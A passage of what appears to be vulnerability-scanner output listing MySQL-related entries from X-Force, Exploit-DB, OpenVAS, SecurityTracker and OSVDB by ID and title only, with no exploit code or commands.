14367| [83552] Oracle MySQL Server Server Install unspecified
14368| [83551] Oracle MySQL Server Server Types denial of service
14369| [83550] Oracle MySQL Server Server Privileges unspecified
14370| [83549] Oracle MySQL Server InnoDB denial of service
14371| [83548] Oracle MySQL Server InnoDB denial of service
14372| [83547] Oracle MySQL Server Data Manipulation Language denial of service
14373| [83546] Oracle MySQL Server Stored Procedure denial of service
14374| [83545] Oracle MySQL Server Server Replication denial of service
14375| [83544] Oracle MySQL Server Server Partition denial of service
14376| [83543] Oracle MySQL Server Server Optimizer denial of service
14377| [83542] Oracle MySQL Server InnoDB denial of service
14378| [83541] Oracle MySQL Server Information Schema denial of service
14379| [83540] Oracle MySQL Server Data Manipulation Language denial of service
14380| [83539] Oracle MySQL Server Data Manipulation Language denial of service
14381| [83538] Oracle MySQL Server Server Optimizer unspecified
14382| [83537] Oracle MySQL Server MemCached denial of service
14383| [83536] Oracle MySQL Server Server Privileges unspecified
14384| [83535] Oracle MySQL Server Server Privileges unspecified
14385| [83534] Oracle MySQL Server Server unspecified
14386| [83533] Oracle MySQL Server Information Schema unspecified
14387| [83532] Oracle MySQL Server Server Locking unspecified
14388| [83531] Oracle MySQL Server Data Manipulation Language denial of service
14389| [83388] MySQL administrative login attempt detected
14390| [82963] Mambo MySQL database information disclosure
14391| [82946] Oracle MySQL buffer overflow
14392| [82945] Oracle MySQL buffer overflow
14393| [82895] Oracle MySQL and MariaDB geometry queries denial of service
14394| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
14395| [81325] Oracle MySQL Server Server Privileges denial of service
14396| [81324] Oracle MySQL Server Server Partition denial of service
14397| [81323] Oracle MySQL Server Server Optimizer denial of service
14398| [81322] Oracle MySQL Server Server Optimizer denial of service
14399| [81321] Oracle MySQL Server Server denial of service
14400| [81320] Oracle MySQL Server MyISAM denial of service
14401| [81319] Oracle MySQL Server InnoDB denial of service
14402| [81318] Oracle MySQL Server InnoDB denial of service
14403| [81317] Oracle MySQL Server Server Locking denial of service
14404| [81316] Oracle MySQL Server Server denial of service
14405| [81315] Oracle MySQL Server Server Replication unspecified
14406| [81314] Oracle MySQL Server Server Replication unspecified
14407| [81313] Oracle MySQL Server Stored Procedure denial of service
14408| [81312] Oracle MySQL Server Server Optimizer denial of service
14409| [81311] Oracle MySQL Server Information Schema denial of service
14410| [81310] Oracle MySQL Server GIS Extension denial of service
14411| [80790] Oracle MySQL yaSSL buffer overflow
14412| [80553] Oracle MySQL and MariaDB salt security bypass
14413| [80443] Oracle MySQL Server unspecified code execution
14414| [80442] Oracle MySQL Server acl_get() buffer overflow
14415| [80440] Oracle MySQL Server table buffer overflow
14416| [80435] Oracle MySQL Server database privilege escalation
14417| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
14418| [80433] Oracle MySQL Server Stuxnet privilege escalation
14419| [80432] Oracle MySQL Server authentication information disclosure
14420| [79394] Oracle MySQL Server Server Installation information disclosure
14421| [79393] Oracle MySQL Server Server Replication denial of service
14422| [79392] Oracle MySQL Server Server Full Text Search denial of service
14423| [79391] Oracle MySQL Server Server denial of service
14424| [79390] Oracle MySQL Server Client information disclosure
14425| [79389] Oracle MySQL Server Server Optimizer denial of service
14426| [79388] Oracle MySQL Server Server Optimizer denial of service
14427| [79387] Oracle MySQL Server Server denial of service
14428| [79386] Oracle MySQL Server InnoDB Plugin denial of service
14429| [79385] Oracle MySQL Server InnoDB denial of service
14430| [79384] Oracle MySQL Server Client unspecified
14431| [79383] Oracle MySQL Server Server denial of service
14432| [79382] Oracle MySQL Server Protocol unspecified
14433| [79381] Oracle MySQL Server Information Schema unspecified
14434| [78954] SilverStripe MySQLDatabase.php information disclosure
14435| [78948] MySQL MyISAM table symlink
14436| [77865] MySQL unknown vuln
14437| [77864] MySQL sort order denial of service
14438| [77768] MySQLDumper refresh_dblist.php information disclosure
14439| [77177] MySQL Squid Access Report unspecified cross-site scripting
14440| [77065] Oracle MySQL Server Optimizer denial of service
14441| [77064] Oracle MySQL Server Optimizer denial of service
14442| [77063] Oracle MySQL Server denial of service
14443| [77062] Oracle MySQL InnoDB denial of service
14444| [77061] Oracle MySQL GIS Extension denial of service
14445| [77060] Oracle MySQL Server Optimizer denial of service
14446| [76189] MySQL unspecified error
14447| [76188] MySQL attempts security bypass
14448| [75287] MySQLDumper restore.php information disclosure
14449| [75286] MySQLDumper filemanagement.php directory traversal
14450| [75285] MySQLDumper main.php cross-site request forgery
14451| [75284] MySQLDumper install.php cross-site scripting
14452| [75283] MySQLDumper install.php file include
14453| [75282] MySQLDumper menu.php code execution
14454| [75022] Oracle MySQL Server Server Optimizer denial of service
14455| [75021] Oracle MySQL Server Server Optimizer denial of service
14456| [75020] Oracle MySQL Server Server DML denial of service
14457| [75019] Oracle MySQL Server Partition denial of service
14458| [75018] Oracle MySQL Server MyISAM denial of service
14459| [75017] Oracle MySQL Server Server Optimizer denial of service
14460| [74672] Oracle MySQL Server multiple unspecified
14461| [73092] MySQL unspecified code execution
14462| [72540] Oracle MySQL Server denial of service
14463| [72539] Oracle MySQL Server unspecified
14464| [72538] Oracle MySQL Server denial of service
14465| [72537] Oracle MySQL Server denial of service
14466| [72536] Oracle MySQL Server unspecified
14467| [72535] Oracle MySQL Server denial of service
14468| [72534] Oracle MySQL Server denial of service
14469| [72533] Oracle MySQL Server denial of service
14470| [72532] Oracle MySQL Server denial of service
14471| [72531] Oracle MySQL Server denial of service
14472| [72530] Oracle MySQL Server denial of service
14473| [72529] Oracle MySQL Server denial of service
14474| [72528] Oracle MySQL Server denial of service
14475| [72527] Oracle MySQL Server denial of service
14476| [72526] Oracle MySQL Server denial of service
14477| [72525] Oracle MySQL Server information disclosure
14478| [72524] Oracle MySQL Server denial of service
14479| [72523] Oracle MySQL Server denial of service
14480| [72522] Oracle MySQL Server denial of service
14481| [72521] Oracle MySQL Server denial of service
14482| [72520] Oracle MySQL Server denial of service
14483| [72519] Oracle MySQL Server denial of service
14484| [72518] Oracle MySQL Server unspecified
14485| [72517] Oracle MySQL Server unspecified
14486| [72516] Oracle MySQL Server unspecified
14487| [72515] Oracle MySQL Server denial of service
14488| [72514] Oracle MySQL Server unspecified
14489| [71965] MySQL port denial of service
14490| [70680] DBD::mysqlPP unspecified SQL injection
14491| [70370] TaskFreak! multi-mysql unspecified path disclosure
14492| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
14493| [68294] MySQLDriverCS statement.cs sql injection
14494| [68175] Prosody MySQL denial of service
14495| [67539] Zend Framework MySQL PDO security bypass
14496| [67254] DirectAdmin MySQL information disclosure
14497| [66567] Xoops mysql.sql information disclosure
14498| [65871] PyWebDAV MySQLAuthHandler class SQL injection
14499| [65543] MySQL Select Arbitrary data into a File
14500| [65529] MySQL Eventum full_name field cross-site scripting
14501| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
14502| [65379] Oracle MySQL Eventum list.php cross-site scripting
14503| [65266] Accellion File Transfer Appliance MySQL default password
14504| [64878] MySQL Geometry denial of service
14505| [64877] MySQL EXPLAIN EXTENDED denial of service
14506| [64876] MySQL prepared statement denial of service
14507| [64845] MySQL extreme-value denial of service
14508| [64844] MySQL Gis_line_string::init_from_wkb denial of service
14509| [64843] MySQL user-variable denial of service
14510| [64842] MySQL view preparation denial of service
14511| [64841] MySQL prepared statement denial of service
14512| [64840] MySQL LONGBLOB denial of service
14513| [64839] MySQL invocations denial of service
14514| [64838] MySQL Gis_line_string::init_from_wkb denial of service
14515| [64689] MySQL dict0crea.c denial of service
14516| [64688] MySQL SET column denial of service
14517| [64687] MySQL BINLOG command denial of service
14518| [64686] MySQL InnoDB denial of service
14519| [64685] MySQL HANDLER interface denial of service
14520| [64684] MySQL Item_singlerow_subselect::store denial of service
14521| [64683] MySQL OK packet denial of service
14522| [63518] MySQL Query Browser GUI Tools information disclosure
14523| [63517] MySQL Administrator GUI Tools information disclosure
14524| [62272] MySQL PolyFromWKB() denial of service
14525| [62269] MySQL LIKE predicates denial of service
14526| [62268] MySQL joins denial of service
14527| [62267] MySQL GREATEST() or LEAST() denial of service
14528| [62266] MySQL GROUP_CONCAT() denial of service
14529| [62265] MySQL expression values denial of service
14530| [62264] MySQL temporary table denial of service
14531| [62263] MySQL LEAST() or GREATEST() denial of service
14532| [62262] MySQL replication privilege escalation
14533| [61739] MySQL WITH ROLLUP denial of service
14534| [61343] MySQL LOAD DATA INFILE denial of service
14535| [61342] MySQL EXPLAIN denial of service
14536| [61341] MySQL HANDLER denial of service
14537| [61340] MySQL BINLOG denial of service
14538| [61339] MySQL IN() or CASE denial of service
14539| [61338] MySQL SET denial of service
14540| [61337] MySQL DDL denial of service
14541| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
14542| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
14543| [61316] PHP php_mysqlnd_auth_write buffer overflow
14544| [61274] MySQL TEMPORARY InnoDB denial of service
14545| [59905] MySQL ALTER DATABASE denial of service
14546| [59841] CMySQLite updateUser.php cross-site request forgery
14547| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
14548| [59075] PHP php_mysqlnd_auth_write() buffer overflow
14549| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
14550| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
14551| [59072] PHP php_mysqlnd_ok_read() information disclosure
14552| [58842] MySQL DROP TABLE file deletion
14553| [58676] Template Shares MySQL information disclosure
14554| [58531] MySQL COM_FIELD_LIST buffer overflow
14555| [58530] MySQL packet denial of service
14556| [58529] MySQL COM_FIELD_LIST security bypass
14557| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
14558| [57925] MySQL UNINSTALL PLUGIN security bypass
14559| [57006] Quicksilver Forums mysqldump information disclosure
14560| [56800] Employee Timeclock Software mysqldump information disclosure
14561| [56200] Flex MySQL Connector ActionScript SQL injection
14562| [55877] MySQL yaSSL buffer overflow
14563| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
14564| [55416] MySQL unspecified buffer overflow
14565| [55382] Ublog UblogMySQL.sql information disclosure
14566| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
14567| [54597] MySQL sql_table.cc security bypass
14568| [54596] MySQL mysqld denial of service
14569| [54365] MySQL OpenSSL security bypass
14570| [54364] MySQL MyISAM table symlink
14571| [53950] The mysql-ocaml mysql_real_escape_string weak security
14572| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
14573| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
14574| [52660] iScouter PHP Web Portal MySQL Password Retrieval
14575| [52220] aa33code mysql.inc information disclosure
14576| [52122] MySQL Connector/J unicode SQL injection
14577| [51614] MySQL dispatch_command() denial of service
14578| [51406] MySQL Connector/NET SSL spoofing
14579| [49202] MySQL UDF command execution
14580| [49050] MySQL XPath denial of service
14581| [48919] Cisco Application Networking Manager MySQL default account password
14582| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
14583| [47544] MySQL Calendar index.php SQL injection
14584| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
14585| [45649] MySQL MyISAM symlink security bypass
14586| [45648] MySQL MyISAM symlinks security bypass
14587| [45607] MySQL Quick Admin actions.php file include
14588| [45606] MySQL Quick Admin index.php file include
14589| [45590] MySQL command-line client cross-site scripting
14590| [45436] PromoteWeb MySQL go.php SQL injection
14591| [45042] MySQL empty bit-string literal denial of service
14592| [44662] mysql-lists unspecified cross-site scripting
14593| [42267] MySQL MyISAM security bypass
14594| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
14595| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
14596| [40920] MySQL sql_select.cc denial of service
14597| [40734] MySQL Server BINLOG privilege escalation
14598| [40350] MySQL password information disclosure
14599| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
14600| [39402] PHP LOCAL INFILE and MySQL extension security bypass
14601| [38999] aurora framework db_mysql.lib SQL injection
14602| [38990] MySQL federated engine denial of service
14603| [38989] MySQL DEFINER value privilege escalation
14604| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
14605| [38964] MySQL RENAME TABLE symlink
14606| [38733] ManageEngine EventLog Analyzer MySQL default password
14607| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
14608| [38189] MySQL default root password
14609| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
14610| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
14611| [36555] PHP MySQL extension multiple functions security bypass
14612| [35960] MySQL view privilege escalation
14613| [35959] MySQL CREATE TABLE LIKE information disclosure
14614| [35958] MySQL connection protocol denial of service
14615| [35291] MySQLDumper main.php security bypass
14616| [34811] MySQL udf_init and mysql_create_function command execution
14617| [34809] MySQL mysql_update privilege escalation
14618| [34349] MySQL ALTER information disclosure
14619| [34348] MySQL mysql_change_db privilege escalation
14620| [34347] MySQL RENAME TABLE weak security
14621| [34232] MySQL IF clause denial of service
14622| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
14623| [33285] Eve-Nuke mysql.php file include
14624| [32957] MySQL Commander dbopen.php file include
14625| [32933] cPanel load_language.php and mysqlconfig.php file include
14626| [32911] MySQL filesort function denial of service
14627| [32462] cPanel passwdmysql cross-site scripting
14628| [32288] RHSA-2006:0544 updates for mysql not installed
14629| [32266] MySQLNewsEngine affichearticles.php3 file include
14630| [31244] The Address Book MySQL export.php password information disclosure
14631| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
14632| [30760] BTSaveMySql URL file disclosure
14633| [30191] StoryStream mysql.php and mysqli.php file include
14634| [30085] MySQL MS-DOS device name denial of service
14635| [30031] Agora MysqlfinderAdmin.php file include
14636| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
14637| [29179] paBugs class.mysql.php file include
14638| [29120] ZoomStats MySQL file include
14639| [28448] MySQL case sensitive database name privilege escalation
14640| [28442] MySQL GRANT EXECUTE privilege escalation
14641| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
14642| [28202] MySQL multiupdate subselect query denial of service
14643| [28180] MySQL MERGE table security bypass
14644| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
14645| [27995] Opsware Network Automation System MySQL plaintext password
14646| [27904] MySQL date_format() format string
14647| [27635] MySQL Instance Manager denial of service
14648| [27212] MySQL SELECT str_to_date denial of service
14649| [26875] MySQL ASCII escaping SQL injection
14650| [26420] Apple Mac OS X MySQL Manager blank password
14651| [26236] MySQL login packet information disclosure
14652| [26232] MySQL COM_TABLE_DUMP buffer overflow
14653| [26228] MySQL sql_parce.cc information disclosure
14654| [26042] MySQL running
14655| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
14656| [24966] MySQL mysql_real_query logging bypass
14657| [24653] PAM-MySQL logging function denial of service
14658| [24652] PAM-MySQL authentication double free code execution
14659| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
14660| [24095] PHP ext/mysqli exception handling format string
14661| [23990] PHP mysql_connect() buffer overflow
14662| [23596] MySQL Auction search module could allow cross-site scripting
14663| [22642] RHSA-2005:334 updates for mysql not installed
14664| [21757] MySQL UDF library functions command execution
14665| [21756] MySQL LoadLibraryEx function denial of service
14666| [21738] MySQL UDF mysql_create_function function directory traversal
14667| [21737] MySQL user defined function buffer overflow
14668| [21640] MySQL Eventum multiple class SQL injection
14669| [21638] MySQL Eventum multiple scripts cross-site scripting
14670| [20984] xmysqladmin temporary file symlink
14671| [20656] MySQL mysql_install_db script symlink
14672| [20333] Plans MySQL password information disclosure
14673| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
14674| [19658] MySQL udf_init function gain access
14675| [19576] auraCMS mysql_fetch_row function path disclosure
14676| [18922] MySQL mysqlaccess script symlink attack
14677| [18824] MySQL UDF root privileges
14678| [18464] mysql_auth unspecified vulnerability
14679| [18449] Sugar Sales plaintext MySQL password
14680| [17783] MySQL underscore allows elevated privileges
14681| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
14682| [17667] MySQL UNION change denial of service
14683| [17666] MySQL ALTER TABLE RENAME bypass restriction
14684| [17493] MySQL libmysqlclient bulk inserts buffer overflow
14685| [17462] MySQLGuest AWSguest.php script cross-site scripting
14686| [17047] MySQL mysql_real_connect buffer overflow
14687| [17030] MySQL mysqlhotcopy insecure temporary file
14688| [16612] MySQL my_rnd buffer overflow
14689| [16604] MySQL check_scramble_323 function allows unauthorized access
14690| [15883] MySQL mysqld_multi script symlink attack
14691| [15617] MySQL mysqlbug script symlink attack
14692| [15417] Confixx db_mysql_loeschen2.php SQL injection
14693| [15280] Proofpoint Protection Server MySQL allows unauthorized access
14694| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
14695| [13153] MySQL long password buffer overflow
14696| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
14697| [12540] Teapop PostSQL and MySQL modules SQL injection
14698| [12337] MySQL mysql_real_connect function buffer overflow
14699| [11510] MySQL datadir/my.cnf modification could allow root privileges
14700| [11493] mysqlcc configuration and connection files are world writable
14701| [11340] SuckBot mod_mysql_logger denial of service
14702| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
14703| [10850] MySQL libmysql client read_one_row buffer overflow
14704| [10849] MySQL libmysql client read_rows buffer overflow
14705| [10848] MySQL COM_CHANGE_USER password buffer overflow
14706| [10847] MySQL COM_CHANGE_USER command password authentication bypass
14707| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
14708| [10483] Bugzilla stores passwords in plain text in the MySQL database
14709| [10455] gBook MySQL could allow administrative access
14710| [10243] MySQL my.ini "
14711| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
14712| [9909] MySQL logging disabled by default on Windows
14713| [9908] MySQL binding to the loopback adapter is disabled
14714| [9902] MySQL default root password could allow unauthorized access
14715| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
14716| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
14717| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
14718| [7206] WinMySQLadmin stores MySQL password in plain text
14719| [6617] MySQL "
14720| [6419] MySQL drop database command buffer overflow
14721| [6418] MySQL libmysqlclient.so buffer overflow
14722| [5969] MySQL select buffer overflow
14723| [5447] pam_mysql authentication input
14724| [5409] MySQL authentication algorithm obtain password hash
14725| [5057] PCCS MySQL Database Admin Tool could reveal username and password
14726| [4228] MySQL unauthenticated remote access
14727| [3849] MySQL default test account could allow any user to connect to the database
14728| [1568] MySQL creates readable log files
14729|
14730| Exploit-DB - https://www.exploit-db.com:
14731| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
14732| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
14733| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
14734|
14735| OpenVAS (Nessus) - http://www.openvas.org:
14736| [53251] Debian Security Advisory DSA 562-1 (mysql)
14737| [53230] Debian Security Advisory DSA 540-1 (mysql)
14738|
14739| SecurityTracker - https://www.securitytracker.com:
14740| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
14741| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
14742| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
14743| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
14744| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
14745| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
14746| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
14747| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
14748| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
14749| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
14750| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
14751| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
14752| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
14753| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
14754| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
14755| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
14756| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
14757| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
14758| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
14759| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
14760| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
14761| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
14762| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
14763| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
14764| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
14765| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
14766| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
14767| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
14768| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
14769| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
14770| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
14771| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
14772| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
14773| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
14774| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
14775| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
14776| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
14777| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
14778| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
14779| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
14780| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
14781| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
14782| [1016790] MySQL Replication Error Lets Local Users Deny Service
14783| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
14784| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
14785| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
14786| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
14787| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
14788| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
14789| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
14790| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
14791| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
14792| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
14793| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
14794| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
14795| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
14796| [1014172] xMySQLadmin Lets Local Users Delete Files
14797| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
14798| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
14799| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
14800| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
14801| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
14802| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
14803| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
14804| [1012500] mysql_auth Memory Leak Has Unspecified Impact
14805| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
14806| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
14807| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
14808| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
14809| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
14810| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
14811| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
14812| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
14813| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
14814| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
14815| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
14816| [1007518] DWebPro Discloses MySQL Database Password to Local Users
14817| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
14818| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
14819| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
14820| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
14821| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
14822| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
14823| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
14824| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
14825| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
14826| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
14827| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
14828| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
14829| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
14830|
14831| OSVDB - http://www.osvdb.org:
14832| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
14833| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
14834| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14835| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
14836| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
14837| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
14838| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
14839| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
14840| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
14841| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
14842| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
14843| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14844| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
14845| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
14846| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
14847| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
14848| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
14849| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
14850| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
14851| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
14852| [93174] MySQL Crafted Derived Table Handling DoS
14853| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
14854| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
14855| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
14856| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
